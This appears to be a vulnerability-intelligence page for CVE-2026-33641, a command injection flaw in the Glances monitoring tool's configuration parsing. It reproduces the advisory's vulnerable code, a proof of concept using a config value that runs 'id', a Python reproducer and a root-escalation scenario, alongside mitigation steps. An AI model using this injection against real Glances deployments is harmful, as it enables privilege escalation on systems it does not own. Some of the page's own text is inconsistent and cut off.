What is the CVSS score of CVE-2026-33641?

CVE-2026-33641 has a CVSS 3.1 base score of 7.8 (High). CVSS vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. EPSS exploitation probability: 0.0%.

Which versions of Python are affected by CVE-2026-33641?

CVE-2026-33641 is a command injection vulnerability in the Glances monitoring tool that allows authenticated local users to execute arbitrary commands through malicious configuration files, with…. A patch is available.

Is there a public PoC exploit available for CVE-2026-33641?

Yes, a public proof-of-concept exploit is available for CVE-2026-33641. Prioritise patching immediately. EPSS: 0.0%.

How to fix or mitigate CVE-2026-33641?

Within 24 hours: Inventory all systems running Glances and identify which instances operate with elevated privileges (root or service accounts); restrict file system write permissions on Glances configuration directories to the service account owner only. Within 7 days: Isolate or disable Glances instances running with unnecessary elevated privileges; monitor configuration file access logs for unauthorized modifications. Within 30 days: Contact Glances vendor for patch timeline; evaluate alternative monitoring solutions or implement strict configuration management controls (read-only mounted config files, SELinux/AppArmor restrictions) as interim mitigation.

Python CVE-2026-33641

HIGH

OS Command Injection (CWE-78)

2026-03-30 https://github.com/nicolargo/glances

GHSA-qhj7-v7h7-q4c7

Python Command Injection Privilege Escalation Suse

7.8

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

7.8 HIGH

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

SUSE

HIGH

qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Attack Vector

Local

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Analysis Generated

Mar 30, 2026 - 17:15 vuln.today

CVE Published

Mar 30, 2026 - 17:01 nvd

HIGH 7.8

Blast Radius

ecosystem impact

† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth

4 pypi packages depend on glances (4 direct, 0 indirect)

Ecosystem-wide dependent count for version 4.5.3.

DescriptionGitHub Advisory

Summary

Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands.

If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation.

Details

Glances loads configuration files from user, system, or custom paths during initialization.
When retrieving a configuration value, Config.get_value() scans for substrings enclosed in backticks.

File: glances/config.py

match = self.re_pattern.findall(ret)
for m in match:
    ret = ret.replace(m, system_exec(m[1:-1]))

The extracted string is passed directly to system_exec().

File: glances/globals.py

res = subprocess.run(command.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8')

The command is executed and its output replaces the original configuration value.

This execution occurs automatically whenever the configuration value is read.

Affected Files

glances/config.py - dynamic configuration parsing

glances/globals.py - command execution helper

Proof of Concept (PoC)

Scenario: Arbitrary command execution via configuration value

Step 1 - Create malicious configuration file

/tmp/glances.conf

add below txt on the file

[outputs]
url_prefix = 'id'

Step 2 - Launch Glances with custom configuration

glances -C /tmp/glances.conf

Step 3 - Observe behavior

When Glances reads the configuration:

The command inside backticks is executed
Output replaces the configuration value
Execution occurs without user interaction

Reproduce using Python code

import subprocess
import re

def system_exec(command):
    return subprocess.run(command.split(' '), stdout=subprocess.PIPE).stdout.decode().strip()

value = "`id`"
pattern = re.compile(r'(`.+?`)')

for m in pattern.findall(value):
    print(system_exec(m[1:-1]))

Output:

uid=1000(user) gid=1000(user) groups=1000(user)

Impact

Arbitrary Command Execution

Any command enclosed in backticks inside a configuration value will execute with the privileges of the Glances process.

Potential Privilege Escalation

If Glances runs as a privileged service (e.g., root), commands execute with those privileges.

Possible scenarios include:

Misconfigured file permissions allowing unauthorized config modification
Shared systems where configuration directories are writable by multiple users
Container environments with mounted configuration volumes
Automated configuration management systems that ingest untrusted data

AnalysisAI

Command injection in Glances Python monitoring tool allows local authenticated users to execute arbitrary system commands via malicious configuration files. Attackers with write access to Glances configuration files can embed shell commands in backtick-enclosed strings that execute automatically during config parsing with the privileges of the Glances process. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Modify Glances config file with backtick commands

Exploit

Glances parses config during startup

Execution

Execute arbitrary system commands

Impact

Gain privileges of Glances process

Access

Modify Glances config file with backtick commands

Exploit

Glances parses config during startup

Execution

Execute arbitrary system commands

Impact

Gain privileges of Glances process

Vulnerability AssessmentAI

Exploitation	Attacker must modify Glances configuration files (e.g., glances.conf) to inject backtick-enclosed system commands. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	Real-world risk is moderate to high depending on deployment context. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker gains low-privileged shell access to a Linux server running Glances as a systemd service with root privileges for comprehensive system monitoring. The attacker discovers the Glances configuration directory /etc/glances/ has overly permissive group-write permissions due to misconfiguration. …
Remediation	Apply vendor-released security patches from the official Glances GitHub repository at https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all systems running Glances and identify which instances operate with elevated privileges (root or service accounts); restrict file system write permissions on Glances configuration directories to the service account owner only. …

Threat intelligence, references, and detailed analysis are available after sign-in.